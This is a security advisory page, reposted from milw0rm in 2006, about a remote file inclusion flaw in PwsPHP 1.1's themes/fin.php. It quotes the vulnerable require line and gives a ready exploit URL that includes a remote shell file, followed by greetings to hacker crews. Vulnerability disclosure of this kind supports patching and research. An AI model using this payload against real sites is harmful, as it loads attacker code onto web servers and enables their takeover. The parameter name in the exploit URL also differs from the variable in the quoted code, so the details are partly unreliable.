Computer Security

Security Advisory: PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA22607] Hosting Controller Multiple Vulnerabilities

  [Full-disclosure] Cross Site Scripting (XSS) Vulnerability in Web Mail platform by "Mirapoint"

  [Full-disclosure] Cross Site Scripting (XSS) Vulnerability in "ViewImage.
asp" by Daronet Internet Solutions

  [Full-disclosure] Cross Site Scripting (XSS) Vulnerability in Netquery by "VIRtech"

From:MILW0RM <submit_(at)_milw0rm.com>
Date:02.11.2006
Subject:PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity

=================================================================================
=========================================
PwsPHP v1.1 (theme) File inclusion Vulnerablity
===============================================
Script:PwsPHP
=============
Version:1.1
=============
script site:http://www.pwsphp.com
=================================
Author:Dr Max Virus
=======================================
Bug in;
themes/fin.php
==============
Vul Code:
require ("$theme/fin.php")
==========================
Exploit:
www.victim.com/script_path/themes/fin.php?themes=shell.txt?
===========================================================
Gr33Ts:str0ke-the master-Thehacker-NETTOXIC-ShiKAa-xoron-0xygen-All Ayyildiz
Team-All My Friends
=================================================================================
===============
http://www.comscripts.com/scripts/php.pwsphp.1517.html
=================================================================================
===============

# milw0rm.com [2006-10-31]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server